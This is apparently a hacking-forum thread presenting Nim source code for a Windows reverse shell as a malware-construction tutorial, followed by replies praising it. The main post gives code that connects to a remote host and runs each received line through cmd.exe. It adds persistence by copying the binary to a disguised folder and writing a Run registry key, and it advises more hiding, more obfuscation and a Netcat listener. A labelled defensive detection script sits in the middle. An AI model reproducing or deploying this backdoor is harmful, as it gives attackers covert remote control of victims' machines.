Nim reverse shell w source code
#1
Hello, in this post I will be demonstrating some principles of malware construction by creating a reverse shell with source code included. The program will be written in Nim. Note: this code is proof of concept, use at risk.

To start, let's put some code here.
Code:
import std/[net, osproc, strformat]

const shell = ">>>  "
let
    ip = "192..192.19.1"
    portt = 4343
    sock = newSocket()

  try: 
    sock.connect(ip, portt.Port)

    while true:
      send(sock, shell)
      let
        load = recvLine(sock)
        execute = execProcess(fmt"cmd.exe /C " & load)
      discard execProcess(fmt"cmd.exe /C " & load)
      send(sock, execute)
  except:
    quit(fmt"cmd.exe /C ")

Now let's look at what this code is doing.

Firstly, we define some variables for connecting. Those are our desired IP address and port; we also define a variable as a new socket. Next we connect to the attacker. Next we have a while true statement that does two things: first, it sends our shell, and then it waits to receive a command and executes that command. Now let's get into some persistence.

Code:
import winregistry

createDir("""C:\Program logs\log history""")
copyFileToDir("reverse_shell.exe", """C:\Program logs\log history""")

var h: RegHandle
h = open("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", samWrite)
h.writeString("reverse_shell", """"C:\Program logs\log history\reverse_shell.exe"""")

This code creates a regKey and a directory to store our program in. Though, you'll want to hide it better than this. So now we have a program that can take cmd commands from an attacker using some basic malware principles. In addition to this code, you will want to take more care with obfuscation.

Each import's purpose is as follows:
  • net for connecting
  • osproc for executing the cmd commands
  • strformat for formatting the strings we want to execute
  • winregistry for creating registry keys

You can use Netcat as a listener, though it does not support multiple connections.
UwU
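
A defender's view of the two behaviours this post describes (a process with an outbound connection feeding received lines to cmd.exe /C, and a Run-key value pointing outside the usual program directories), as an added example that is not part of the original post. The event dictionaries are a constructed, simplified schema, and the trusted-directory list and function names are assumptions.

```python
# Added defensive example; the event dicts are a constructed, simplified schema
# (an assumption), not a real log format.
from collections import Counter

RUN_KEY_SUFFIX = "\\software\\microsoft\\windows\\currentversion\\run"
# Assumption: autostart binaries are expected only under these directories.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

def run_key_findings(events):
    """Run-key values whose target executable lives outside TRUSTED_DIRS."""
    hits = []
    for e in events:
        if e["type"] != "reg_set" or not e["key"].lower().endswith(RUN_KEY_SUFFIX):
            continue
        target = e["data"].strip().strip('"').lower()
        if not target.startswith(TRUSTED_DIRS):
            hits.append((e["value"], e["data"]))
    return hits

def shell_spawn_findings(events, threshold=2):
    """PIDs that opened an outbound connection, then spawned cmd.exe /C repeatedly."""
    networked, spawns = set(), Counter()
    for e in events:  # events are assumed to be in time order
        if e["type"] == "net_connect":
            networked.add(e["pid"])
        elif e["type"] == "proc_create":
            is_cmd = e["image"].lower().endswith("\\cmd.exe")
            if is_cmd and "/c" in e["cmdline"].lower() and e["ppid"] in networked:
                spawns[e["ppid"]] += 1
    return sorted(pid for pid, n in spawns.items() if n >= threshold)

BAD = r"C:\Program logs\log history\reverse_shell.exe"  # path used in the post
SAMPLE_EVENTS = [  # constructed for this example
    {"type": "reg_set", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "reverse_shell", "data": f'"{BAD}"'},
    {"type": "reg_set", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r'"C:\Program Files\Vendor\updater.exe" /background'},
    {"type": "net_connect", "pid": 4120, "image": BAD, "dst": "203.0.113.5:4343"},
    {"type": "proc_create", "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /C whoami"},  # the posted loop calls execProcess twice
    {"type": "proc_create", "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /C whoami"},  # per received command, so spawns come in pairs
    {"type": "proc_create", "ppid": 900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /C build.bat"},  # no prior connection: not flagged
]

if __name__ == "__main__":
    print(run_key_findings(SAMPLE_EVENTS))
    print(shell_spawn_findings(SAMPLE_EVENTS))
```
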
#2
Good tutorial, though you didn't explain what the imports do.
Still good stuff, thank you for sharing.
If you have any questions, please PM dkota
#3
prince97 Wrote: Good tutorial, though you didn't explain what the imports do.
Still good stuff, thank you for sharing.

Edited, thank you.
UwU
#4
basic but lit...
thanks for this amazing tut